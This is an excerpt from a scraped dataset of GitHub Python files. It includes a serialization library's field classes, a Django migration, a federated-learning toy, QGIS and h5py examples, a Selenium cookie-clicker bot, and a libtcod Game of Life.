[False, 'false', '0', 0, 'False'])\n\n super(BooleanFieldOpts, self).__init__(**kwargs)\n self.choices = set(self.true_boolean_values +\n self.false_boolean_values)\n\n\nclass Boolean(Field):\n \"\"\":class:`Boolean` represents a value that must be valid\n boolean type.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n active = field.Boolean(\n required=True,\n true_boolean_values=[True, 'true', 1],\n false_boolean_values=[False, 'false', 0])\n\n \"\"\"\n\n opts_class = BooleanFieldOpts\n marshal_pipeline = BooleanMarshalPipeline\n serialize_pipeline = BooleanSerializePipeline\n\n\nclass NestedFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Nested`.\n\n \"\"\"\n\n def __init__(self, mapper_or_mapper_name, **kwargs):\n \"\"\"Construct a new instance of :class:`NestedFieldOpts`\n\n :param mapper_or_mapper_name: a required instance of a :class:`Mapper`\n or a valid mapper name\n :param role: specify the name of a role to use on the Nested mapper\n :param collection_class: provide a custom type to be used when\n mapping many nested objects\n :param getter: provide a function taking a pipeline session which returns\n the object to be set on this field, or None if it can't find one.\n This is useful where your API accepts simply `{'id': 2}` but you\n want a full object to be set\n :param allow_updates: Allow existing objects returned by the ``getter`` function\n to be updated.\n :param allow_updates_in_place: Whereas allow_updates requires the getter to\n return an existing object which it will then update, allow_updates_in_place\n will make updates to any existing object it finds at the specified key.\n :param allow_create: If the ``getter`` returns None, allow the Nested field to\n create a new instance.\n :param allow_partial_updates: Allow existing object to be updated using a subset\n of the fields defined on the Nested field.\n \"\"\"\n self.mapper = mapper_or_mapper_name\n self.role = kwargs.pop('role', '__default__')\n self.collection_class = kwargs.pop('collection_class', list)\n self.getter = kwargs.pop('getter', None)\n self.allow_updates = kwargs.pop('allow_updates', False)\n self.allow_updates_in_place = kwargs.pop(\n 'allow_updates_in_place', False)\n self.allow_partial_updates = kwargs.pop(\n 'allow_partial_updates', False)\n self.allow_create = kwargs.pop('allow_create', False)\n super(NestedFieldOpts, self).__init__(**kwargs)\n\n\nclass Nested(Field):\n \"\"\":class:`Nested` represents an object that is represented by another\n mapper.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class PostMapper(Mapper):\n __type__ = User\n\n id = field.String()\n name= field.String()\n content = field.String()\n user = field.Nested(\n 'UserMapper',\n role='public',\n getter=user_getter,\n allow_upadtes=False,\n allow_partial_updates=False,\n allow_updates_in_place=False,\n allow_create=False,\n required=True)\n\n .. seealso::\n :class:`NestedFieldOpts`\n\n \"\"\"\n\n opts_class = NestedFieldOpts\n marshal_pipeline = NestedMarshalPipeline\n serialize_pipeline = NestedSerializePipeline\n\n def __init__(self, *args, **kwargs):\n\n super(Nested, self).__init__(*args, **kwargs)\n self._mapper_class = None\n\n def get_mapper(self, as_class=False, **mapper_params):\n \"\"\"Retrieve the specified mapper from the Mapper registry.\n\n :param as_class: Return the Mapper class object without\n calling the constructor. This is typically used when nested\n is mapping many objects.\n :param mapper_params: A dict of kwarg's to pass to the specified\n mappers constructor\n\n :rtype: :class:`Mapper`\n :returns: a new instance of the specified mapper\n \"\"\"\n\n from .mapper import get_mapper_from_registry\n\n if self._mapper_class is None:\n mapper = get_mapper_from_registry(self.opts.mapper)\n self._mapper_class = mapper\n\n if as_class:\n return self._mapper_class\n else:\n return self._mapper_class(**mapper_params)\n\n\nclass CollectionFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Collection`.\n\n \"\"\"\n\n def __init__(self, field, **kwargs):\n \"\"\"Construct a new instance of :class:`.CollectionFieldOpts`\n\n :param field: Specify the field type mpapped inside of this collection. This\n may be any :class:`Field` type.\n :param unique_on: Specify a key that is used to check the collection\n for duplicates.\n\n \"\"\"\n self.field = field\n try:\n self.field.name\n except FieldError:\n pass\n else:\n raise FieldError('name/attribute_name/source should '\n 'not be passed to a wrapped field.')\n\n self.field.opts._is_wrapped = True\n self.unique_on = kwargs.pop('unique_on', None)\n super(CollectionFieldOpts, self).__init__(**kwargs)\n\n def set_name(self, *args, **kwargs):\n \"\"\"proxy access to the :class:`FieldOpts` defined for\n this collections field.\n\n :returns: None\n\n \"\"\"\n self.field.opts.set_name(*args, **kwargs)\n super(CollectionFieldOpts, self).set_name(*args, **kwargs)\n\n def get_name(self):\n \"\"\"Proxy access to the :class:`FieldOpts` defined for\n this collections field.\n\n :rtype: str\n :returns: The value of get_name from the collections Field.\n\n \"\"\"\n\n return self.field.name\n\n def validate(self):\n \"\"\"Exra validation for Collection Field.\n\n :raises: FieldOptsError\n \"\"\"\n\n if not isinstance(self.field, Field):\n raise FieldOptsError('Collection requires a valid Field '\n 'instance as its first argument')\n\n\nclass Collection(Field):\n \"\"\":class:`Collection` represents collection of other field types,\n typically stored in a list.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.String()\n friends = field.Collection(field.Nested('UserMapper', required=True))\n user_ids = field.Collection(field.String())\n\n .. seealso::\n :class:`CollectionFieldOpts`\n\n \"\"\"\n\n marshal_pipeline = CollectionMarshalPipeline\n serialize_pipeline = CollectionSerializePipeline\n opts_class = CollectionFieldOpts\n\n\nclass StaticFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Static`.\n\n \"\"\"\n\n def __init__(self, value, **kwargs):\n \"\"\"Construct a new instance of :class:`StaticFieldOpts`\n\n :param value: specify the static value to return when this field\n is serialized.\n\n \"\"\"\n self.value = value\n super(StaticFieldOpts, self).__init__(**kwargs)\n self.read_only = True\n\n\nclass Static(Field):\n \"\"\":class:`Static` represents a field that outputs a constant value.\n\n This field is implicitly read_only and therefore is typically only used\n during serialization flows.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.String()\n object_type = field.Static(value='user')\n \"\"\"\n opts_class = StaticFieldOpts\n serialize_pipeline = StaticSerializePipeline\n\n\nclass DateTimeFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`DateTime`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Construct a new instance of :class:`DateTimeFieldOpts`\n\n :param format_str: Specify a format string used to validate an\n incoming date string. If not value is passed then the format defaults to\n iso8601.\n\n \"\"\"\n self.date_format = kwargs.pop('format_str', 'iso8601')\n super(DateTimeFieldOpts, self).__init__(**kwargs)\n self.error_msgs['invalid'] = 'Not a valid datetime.'\n\n\nclass DateFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Date`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Construct a new instance of :class:`Date`\n\n :param format_str: Specify a format string used to validate an\n incoming date string. If not value is passed then the format defaults to\n iso8601.\n\n \"\"\"\n self.date_format = kwargs.pop('format_str', '%Y-%m-%d')\n super(DateFieldOpts, self).__init__(**kwargs)\n self.error_msgs['invalid'] = 'Not a valid date.'\n\n\nclass DateTime(Field):\n \"\"\":class:`DateTime` represents an iso8601 encoded date time\n\n .. code-block:: python\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n created_at = field.DateTime(required=True)\n\n \"\"\"\n\n opts_class = DateTimeFieldOpts\n marshal_pipeline = DateTimeMarshalPipeline\n serialize_pipeline = DateTimeSerializePipeline\n\n\nclass Date(DateTime):\n \"\"\":class:`Date` represents a date object\n\n .. code-block:: python\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n signup_date = field.Date(required=True)\n\n \"\"\"\n\n opts_class = DateFieldOpts\n marshal_pipeline = DateMarshalPipeline\n","repo_name":"mikeywaites/kim","sub_path":"kim/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":27232,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"77"} +{"seq_id":"71354994809","text":"\r\ndef read_file_into_list(filename):\r\n lines = []\r\n\r\n file = open(filename, \"r\")\r\n for line in file:\r\n lines.append(int(line))\r\n\r\n return lines\r\n\r\ndef read_intcode(filename):\r\n with open(filename, \"r\") as f:\r\n line = f.read()\r\n line = line.split(',')\r\n ints = [int(x) for x in line]\r\n return ints\r\n","repo_name":"squidgreen/aoc-2019","sub_path":"common/read_fxns.py","file_name":"read_fxns.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19041745392","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('payment', '0010_receiptdata'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='receiptdata',\n name='remarks',\n field=models.TextField(null=True, blank=True),\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/payment/migrations/0011_receiptdata_remarks.py","file_name":"0011_receiptdata_remarks.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74056986488","text":"# future statements like these are kept for backwards compability\n# which I am not sure make much sense since python 3.5 is needed for tensorflow\n#from __future__ import absolute_import, division, print_function, unicode_literals\n\n# TensorFlow and keras\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# Helper libraries\nimport numpy as np\n\ngraph = tf.get_default_graph()\n\nclass Device:\n def __init__(self, device_id):\n self.id = device_id\n self.round_ready = False\n self.ready = False\n self.weights = None\n\n self.X_train = None\n self.y_train = None\n\n\nclass Federation:\n def __init__(self, fed_id=0):\n self.id = fed_id\n self.model = None\n self.global_weights = None\n\n self.load_mnist_dataset()\n self.instantiate_model()\n\n self.device_id = 0\n self.connected_devices = []\n\n self.first_round = True\n self.ready = False\n\n def __str__(self):\n return \"Federation id: \" + str(self.id) + \"\\nmodel: \\n\" + self.model.to_json()\n\n def connect_device(self):\n device = Device(self.device_id)\n self.connected_devices.append(device)\n self.device_id += 1\n return (self.device_id - 1)\n\n def set_fed_ready(self):\n self.ready = True\n # initate the data for the devices\n n_devices = len(self.connected_devices)\n points_per_device = 60000 // n_devices\n points_per_device = 2000\n n_points = n_devices * points_per_device\n\n self.X_used = self.X_train[:n_points]\n self.y_used = self.y_train[:n_points]\n\n self.X_list = [ X.tolist() for X in np.split(self.X_used, n_devices) ]\n self.y_list = [ y.tolist() for y in np.split(self.y_used, n_devices) ]\n\n def load_mnist_dataset(self):\n digits_mnist = keras.datasets.mnist\n\n (self.X_train, self.y_train), (self.X_test, self.y_test) = digits_mnist.load_data()\n self.X_train = self.X_train / 255.0\n self.X_test = self.X_test / 255.0\n\n #self.X_send = self.X_train[:5000]\n #self.y_send = self.y_train[:5000]\n\n #self.send2 = {}\n #self.send2['X_train'] = self.X_send.tolist()\n #self.send2['y_train'] = self.y_send.tolist()\n #self.send2 = \"sd\"\n #self.send = [ (X.tolist(), y.tolist()) for X, y in zip(self.X_send, self.y_send) ]\n\n\n def instantiate_model(self):\n self.model = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n ])\n self.model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n def get_model_config(self):\n return self.model.to_json()\n\n def set_random_weights(self):\n self.global_weights = self.model.get_weights()\n\n def get_device_data(self, device_id):\n device_id = int(device_id)\n data = {}\n data['X_train'] = self.X_list[device_id]\n data['y_train'] = self.y_list[device_id]\n return data\n\n def aggregate_function(self):\n if all([ device.round_ready for device in self.connected_devices ]):\n global_weights = [ w * 0 for w in self.global_weights]\n for device in self.connected_devices:\n global_weights = [ w1 + w2 for w1, w2 in zip(global_weights, device.weights) ]\n self.global_weights = [ w/len(self.connected_devices) for w in global_weights]\n \n def test_model(self):\n # Train all the device models and the aggregation\n pass\n\nif __name__ == '__main__':\n fed = Federation()\n print(\"Type: \", type(fed.X_train), \"Shape: \", fed.X_train.shape)\n\n","repo_name":"robertcarlsson/federated-learning-system","sub_path":"federation/federation.py","file_name":"federation.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"9107906308","text":"#! /usr/bin/env python3\n\nimport h5py\nimport numpy\n\n# The following example shows how h5py interoperates with numpy arrays.\n# Let us use a dummy numpy array for this purpose. Let us store data using\n# double precision\ndata = numpy.zeros((10, 3), 'f8') # <== This maps a double[10][3] C array in\n # memory\n\n\nwith h5py.File('example.hdf5', 'w') as f:\n # By default the shape and data type of the HDF5 dataset are inferred from\n # the NumPy array (shape, dtype attributes). E.g.\n dataset = f.create_dataset('data', data=data)\n\n # We can override the shape and data type when storing the data to file,\n # E.g. as:\n dataset = f.create_dataset('data_flat_float', data=data,\n shape=(data.size,), # <== Here we store the data\n # flat as a 1d array\n\n dtype='f4') # <== Here we store the data in file\n # using float instead of double\n\n\nwith h5py.File('example.hdf5', 'r') as f:\n dataset = f['data_flat_float'] # <== This is a handle. It does not load the\n # data from file. Data are loaded when\n # accessed\n\n flat_data = numpy.array(dataset,\n dtype='f8') # <== This forces loading the data.\n # In addition we store them\n # back in memory using double\n # precision\n\n data = flat_data.reshape((10, 3)) # <== This restores the initial shape.\n # Note that is does not copy the data!\n # Only the way there are accessed is\n # changed. I.e. flat_data and data\n # refer to the same memory\n\nprint(data)\nflat_data[3] = 1\nprint(data[1,0])\n","repo_name":"grand-mother/h5py-examples","sub_path":"examples/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5547844526","text":"import csv\nfrom pathlib import Path\nimport shutil\n\n# Empty the output directory\ndocs_dir = Path('docs/')\nshutil.rmtree(docs_dir, ignore_errors=True)\ndocs_dir.mkdir()\n\n# Load the redirects that need to be created\nwith open('redirects.csv') as f:\n reader = csv.reader(f)\n redirects = [\n # Change the from_url into an appropriate local path\n (from_url.lstrip('/'), to_url) if from_url.endswith('.html')\n # For directories, add an index.html\n else ('index.html', to_url) if from_url == '/'\n else (from_url.strip('/') + '/index.html', to_url)\n for (from_url, to_url) in reader\n ]\n\n# Create the redirect files\nhtml_template = \"\"\"\n\n \n \n Redirecting to {to_url}\n \n \n \n \n This page has moved to {to_url}.\n \n\"\"\"\n\nfor from_url, to_url in redirects:\n print(from_url, to_url)\n\n # Create any necessary folders\n output_file = docs_dir / from_url\n output_dir = output_file.parent\n output_dir.mkdir(parents=True, exist_ok=True)\n\n # Output a formatted template\n with open(output_file, 'w') as f:\n f.write(html_template.format(to_url=to_url))\n","repo_name":"jean-golding-institute/jean-golding-institute.github.io","sub_path":"generate_redirects.py","file_name":"generate_redirects.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3223829896","text":"import requests\n\nheaders = {\n 'BQAPPTOK': '{BQAPPTOK}',\n 'BQMODTOK': '{BQMODTOK}',\n}\npayload = {\n 'initialDate': '2018-01-01',\n 'limit': '10',\n 'users': 'ivan@beepquest.com,fernando@hellodave.mx',\n}\nr = requests.get('{url_api}/v1/question-module-answers'.format(\n url_api='http://api.beepquest.com'\n), headers=headers, params=payload)\n\nprint(r.json())\n","repo_name":"BeepQuest/api","sub_path":"samples/python3/get_module_answers.py","file_name":"get_module_answers.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15018099816","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nVariable-Width Vertex-Wise Buffer\n\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\nfrom qgis.core import ( # pylint:disable=import-error,no-name-in-module\n QgsExpression,\n QgsExpressionContextScope,\n QgsFeature,\n QgsLineString,\n QgsPoint,\n QgsProcessing,\n QgsProcessingException,\n QgsProcessingFeatureBasedAlgorithm,\n QgsProcessingParameterEnum,\n QgsProcessingParameterExpression,\n QgsWkbTypes\n)\n\nfrom ..metadata import AlgorithmMetadata\n\nclass TransformCoordinateByExpression(AlgorithmMetadata, QgsProcessingFeatureBasedAlgorithm):\n \"\"\"\n Transform Z or M coordinate using an expression that is evaluated for each input vertex.\n\n The expression can include coordinates, and other fields values :\n - var('x') : vertex X coordinate\n - var('y') : vertex Y coordinate\n - var('z') : vertex Z coordinate\n - var('m') : vertex M coordinate\n - var('vertex') : vertex index\n \"\"\"\n\n METADATA = AlgorithmMetadata.read(__file__, 'TransformCoordinateByExpression')\n\n EXPRESSION = 'EXPRESSION'\n STORE = 'STORE'\n\n STORE_M = 0\n STORE_Z = 1\n\n def initParameters(self, configuration): #pylint: disable=unused-argument,missing-docstring\n\n self.addParameter(QgsProcessingParameterExpression(\n self.EXPRESSION,\n self.tr('Expression'),\n parentLayerParameterName='INPUT',\n defaultValue=\"var('vertex')\"))\n\n # self.addParameter(QgsProcessingParameterString(\n # self.EXPRESSION,\n # self.tr('Expression'),\n # defaultValue='vertex'))\n\n self.addParameter(QgsProcessingParameterEnum(\n self.STORE,\n self.tr('Store Result In'),\n options=[self.tr(option) for option in ['M', 'Z']],\n defaultValue=0))\n\n def inputLayerTypes(self): #pylint: disable=no-self-use,missing-docstring\n return [QgsProcessing.TypeVectorLine]\n\n def outputName(self): #pylint: disable=missing-docstring\n return self.tr('Transformed')\n\n def outputWkbType(self, inputWkbType): #pylint: disable=no-self-use,unused-argument,missing-docstring\n return QgsWkbTypes.LineStringZM\n\n def supportInPlaceEdit(self, layer): #pylint: disable=unused-argument,no-self-use,missing-docstring\n return False\n\n def prepareAlgorithm(self, parameters, context, feedback): #pylint: disable=unused-argument,missing-docstring\n\n store = self.parameterAsInt(parameters, self.STORE, context)\n\n self.vertex_scope = QgsExpressionContextScope()\n\n for variable in ('x', 'y', 'z', 'm', 'vertex'):\n var = QgsExpressionContextScope.StaticVariable(\n variable, 0.0,\n readOnly=False,\n isStatic=False)\n self.vertex_scope.addVariable(var)\n context.expressionContext().appendScope(self.vertex_scope)\n\n self.store_m = (store == self.STORE_M)\n\n # context.setExpressionContext(self.expression_context)\n\n self.expression = QgsExpression(self.parameterAsExpression(parameters, self.EXPRESSION, context))\n if self.expression.hasParserError():\n feedback.reportError(self.expression.parserErrorString())\n return False\n\n self.expression.prepare(context.expressionContext())\n\n return True\n\n def transform(self, geometry, context):\n \"\"\"\n Evaluate input expression for each vertex,\n and store the result into M coordinate.\n Returns QgsLineString\n \"\"\"\n\n vertices = list()\n\n for i, vertex in enumerate(geometry.vertices()):\n\n self.vertex_scope.setVariable('x', vertex.x())\n self.vertex_scope.setVariable('y', vertex.y())\n self.vertex_scope.setVariable('z', vertex.z())\n self.vertex_scope.setVariable('m', vertex.m())\n self.vertex_scope.setVariable('vertex', i)\n\n value = self.expression.evaluate(context.expressionContext())\n if self.expression.hasEvalError():\n raise QgsProcessingException(\n self.tr('Evaluation error: {0}').format(self.expression.evalErrorString()))\n\n if self.store_m:\n vertices.append(QgsPoint(vertex.x(), vertex.y(), vertex.z(), value))\n else:\n vertices.append(QgsPoint(vertex.x(), vertex.y(), value, vertex.m()))\n\n return QgsLineString(vertices)\n\n def processFeature(self, feature, context, feedback): #pylint: disable=no-self-use,unused-argument,missing-docstring\n\n features = []\n\n for geometry in feature.geometry().asGeometryCollection():\n new_geometry = self.transform(geometry, context)\n new_feature = QgsFeature()\n new_feature.setAttributes(feature.attributes())\n new_feature.setGeometry(new_geometry)\n features.append(new_feature)\n\n return features\n","repo_name":"tramebleue/fct-qgis","sub_path":"fct/algorithms/vector/TransformCoordinateByExpression.py","file_name":"TransformCoordinateByExpression.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"21874159366","text":"class Solution:\n def partition(self, nums, l, r):\n k = random.randint(l, r)\n pivot = nums[k]\n nums[l], nums[k] = nums[k], nums[l]\n index = l\n for i in range(l + 1, r + 1):\n if nums[i] > pivot:\n index += 1\n nums[i], nums[index] = nums[index], nums[i]\n nums[l], nums[index] = nums[index], nums[l]\n return index\n\n def findKthLargest(self, nums: List[int], k: int) -> int:\n l, r, k = 0, len(nums) - 1, k - 1\n while 1:\n p = self.partition(nums, l, r)\n if p == k:\n return nums[p]\n elif p > k:\n r = p - 1\n else:\n l = p + 1\n","repo_name":"decoin/leetcode","sub_path":"0215. 数组中的第K个最大元素/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32177133797","text":"from selenium import webdriver\r\nimport time\r\n\r\nchrome_driver_path = \"D:/Pycharm Projects/chromedriver.exe\"\r\ndriver = webdriver.Chrome(executable_path=chrome_driver_path)\r\n\r\ndriver.get(\"http://orteil.dashnet.org/experiments/cookie/\")\r\ncookie = driver.find_element_by_id(\"cookie\")\r\n\r\ntimeout = time.time() + 5\r\nfive_min = time.time() + 5*60\r\n\r\nbuy = {\r\n 7: \"buyTime machine\",\r\n 6: \"buyPortal\",\r\n 5: \"buyAlchemy lab\",\r\n 4: \"buyShipment\",\r\n 3: \"buyMine\",\r\n 2: \"buyFactory\",\r\n 1: \"buyGrandma\",\r\n 0: \"buyCursor\"\r\n}\r\n\r\nwhile True:\r\n cookie.click()\r\n\r\n if time.time() > timeout:\r\n money = int(driver.find_element_by_id(\"money\").text.replace(\",\", \"\"))\r\n store = driver.find_elements_by_css_selector(\"#store b\")\r\n prices = []\r\n for item in store:\r\n try:\r\n prices.append(int(item.text.split(\" - \")[1].replace(\",\", \"\")))\r\n except IndexError:\r\n continue\r\n\r\n highest_price = 0\r\n for num in range(len(prices)):\r\n if money > prices[num] > highest_price:\r\n index = num\r\n highest_price = prices[num]\r\n\r\n driver.find_element_by_id(buy[index]).click()\r\n\r\n timeout += 5\r\n\r\n if time.time() > five_min:\r\n cookie_per_s = driver.find_element_by_id(\"cps\").text\r\n print(cookie_per_s)\r\n break\r\n","repo_name":"Mehtabalism/Cookie-Clicker-Game-Automation","sub_path":"Cookie_Clicker_Project.py","file_name":"Cookie_Clicker_Project.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14505337505","text":"import libtcodpy as libtcod\nfrom gamestuff import *\nimport data\nimport entitydata\nimport time\n\nclass World(object):\n def __init__(self, nwidth, nheight, alivechar, deadchar,char_option, rndgen):\n \n self.nwidth = nwidth\n self.nheight = nheight\n self.alive = alivechar\n self.dead = deadchar\n self.char_option = char_option\n self.population =[]\n self.generation = 0\n self.rndgen = rndgen\n\n self.con = libtcod.console_new(self.nwidth,self.nheight)\n\n self.init_world()\n\n def init_world(self):\n self.generation = 0\n self.population = [[ flip_coin(self.rndgen)\n for yy in range(self.nheight) ]\n for xx in range(self.nwidth) ]\n\n def check_stable(self):\n MAX_POP = 125\n num_unstable=0\n for yy in range(self.nheight):\n for xx in range(self.nwidth):\n if self.population[xx][yy] > 2 and self.population[xx][yy] <=MAX_POP:\n num_unstable+=1\n\n if num_unstable < 5 and self.generation >500:\n self.init_world() \n\n def get_world(self):\n libtcod.console_clear(self.con)\n for yy in range(self.nheight): \n for xx in range(self.nwidth):\n #my_color=self.random_color() \n my_color = self.get_color(self.population[xx][yy])\n libtcod.console_set_default_foreground(self.con, my_color)\n libtcod.console_print_ex(self.con, xx, yy, libtcod.BKGND_NONE, libtcod.LEFT, self.get_entity(self.population[xx][yy], self.char_option))\n return self.con\n\n def get_entity(self, entity, option):\n Max_ASCII = 125\n ASCII_offset = 23\n\n if option is 'symbol':\n\n if entity == 0:\n return ' '\n elif entity < 10:\n return '.'\n elif entity >=10 and entity < 20:\n return ','\n elif entity >=20 and entity < 30:\n return '_'\n elif entity >=30 and entity < 40:\n return '-'\n elif entity >=40 and entity < 50:\n return '|'\n elif entity >=50 and entity < 60:\n return '+'\n elif entity >=60 and entity < 70:\n return 'x'\n elif entity >=70 and entity < 80:\n return '='\n elif entity >=80 and entity < 90:\n return '#'\n elif entity >=90 and entity < 100:\n return 'o'\n else:\n return '@'\n elif option is 'ascii':\n if entity == 0:\n thechar = ' '\n elif entity < 10:\n thechar = entity\n elif entity >=10 and entity <= Max_ASCII - ASCII_offset:\n thechar = chr(entity + ASCII_offset)\n else:\n thechar = chr(Max_ASCII + 1)\n\n return str(thechar)\n\n def update(self):\n self.generation+=1\n new_population = []\n new_population = [[ 0\n for yy in range(self.nheight) ]\n for xx in range(self.nwidth) ]\n\n for yy in range(self.nheight): \n for xx in range(self.nwidth): \n\n if self.isalive(self.population[xx][yy]):\n state = self.alive\n else:\n state = self.dead\n\n num_neighbors = self.neighbors(xx,yy)\n #print str(xx) + '/' + str(yy) + ':' + str(state) + '\\t' + str(num_neighbors)\n if state == self.alive:\n #check rules 1 & 3 (rule 2, nothing happens)\n if num_neighbors <2 or num_neighbors >3:\n #rule 1: #neighbors < 2, alive->dead\n #rule 3: #neighbors = 4, alive->dead\n new_population[xx][yy] = 0\n #print '!!! DEATH !!!'\n else:\n new_population[xx][yy] = self.population[xx][yy]+1\n #print 'STAYIN ALIVE!'\n else: #dead\n #check rule 4\n if num_neighbors == 3:\n #rule 4: #neighbors = 3 alive, dead->alive\n new_population[xx][yy] = self.population[xx][yy]+1\n #print '??? BACK FROM DEATH ???'\n\n self.population = new_population\n \n def get_color(self, code):\n rr = 8\n gg = 8 + code*2\n bb = 8\n\n if gg > 255:\n rr = 128\n gg = 255\n bb = 128\n\n return libtcod.Color(rr,gg,bb)\n\n def random_color(self):\n rr = libtcod.random_get_int(0,0,255)\n gg = libtcod.random_get_int(0,0,255)\n bb = libtcod.random_get_int(0,0,255)\n return libtcod.Color(rr,gg,bb)\n\n def isalive(self,entity):\n if entity > 0:\n return True\n else:\n return False\n\n def neighbors(self, xx,yy):\n num_neighbors=0\n\n if xx != 0: #not far left\n if self.isalive(self.population[xx-1][yy]):\n num_neighbors+=1\n\n if xx !=self.nwidth-1: #not far right\n if self.isalive(self.population[xx+1][yy]):\n num_neighbors+=1 \n\n if yy != 0: #not far bottom\n if self.isalive(self.population[xx][yy-1]):\n num_neighbors+=1\n\n if yy != self.nheight-1: #not far top\n if self.isalive(self.population[xx][yy+1]):\n num_neighbors+=1\n\n if xx != 0 and yy != 0: #not bottom left\n if self.isalive(self.population[xx-1][yy-1]):\n num_neighbors+=1\n\n if xx != 0 and yy != self.nheight-1: #not top left\n if self.isalive(self.population[xx-1][yy+1]):\n num_neighbors+=1\n\n if xx != nwidth-1 and yy != 0: #not bottom right\n if self.isalive(self.population[xx+1][yy-1]):\n num_neighbors+=1\n\n if xx != nwidth-1 and yy != nheight-1: #not top right\n if self.isalive(self.population[xx+1][yy+1]):\n num_neighbors+=1\n\n return num_neighbors\n\n\n\n def __str__(self):\n ret=''\n for yy in range(self.nheight): \n ret= ret + '|' \n for xx in range(self.nwidth):\n ret= ret + str(self.population[xx][yy])\n ret= ret + '|\\n'\n return(ret)\n\n\n#create world\nnwidth = 100\nnheight = 60\nalivechar = '+'\ndeadchar = ' '\nchar_option = 'ascii'\nspeed = .1\ninc = 0.01\n\n# default generator\ndefault = libtcod.random_get_instance()\n# another random generator\nmy_random = libtcod.random_new()\n# a random generator with a specific seed\nmy_determinist_random = libtcod.random_new_from_seed(0xdeadbeef)\n\nworld = World(nwidth,nheight, alivechar, deadchar, char_option, my_determinist_random)\n\nlibtcod.console_set_custom_font('oryx_tiles3.png', libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_TCOD, 32, 12)\nlibtcod.console_init_root(nwidth, nheight, 'johnstein\\'s Game of RogueLife!', False, libtcod.RENDERER_SDL)\nlibtcod.sys_set_fps(30)\n\nlibtcod.console_map_ascii_codes_to_font(256 , 32, 0, 5) #map all characters in 1st row\nlibtcod.console_map_ascii_codes_to_font(256+32, 32, 0, 6) #map all characters in 2nd row\n\nmouse = libtcod.Mouse()\nkey = libtcod.Key() \n\n#initialize population\n\n#enter game loop and check for user input\nwhile not libtcod.console_is_window_closed():\n libtcod.sys_check_for_event(libtcod.EVENT_KEY_PRESS | libtcod.EVENT_MOUSE, key, mouse)\n\n if key.vk == libtcod.KEY_ESCAPE:\n break\n if key.vk == libtcod.KEY_TAB:\n world.init_world()\n if key.vk == libtcod.KEY_UP:\n speed-=inc\n if key.vk ==libtcod.KEY_DOWN:\n speed+=inc\n if key.vk == libtcod.KEY_RIGHT:\n inc+=.01\n if key.vk ==libtcod.KEY_LEFT:\n inc-=.01\n\n if speed <0:\n speed = .001\n #display world\n con_world = world.get_world()\n libtcod.console_blit(con_world, 0, 0, nwidth, nheight, 0, 0, 0)\n libtcod.console_flush()\n #waitkey = libtcod.console_wait_for_keypress(True)\n \n #check rules and create new population\n #replace old population with new one\n time.sleep(speed)\n world.update()\n world.check_stable()\n","repo_name":"jmbjr/dungeoneer","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"71437180089","text":"'''\nAuthor: rocs\nDate: 2023-08-18 18:21:42\nLastEditors: 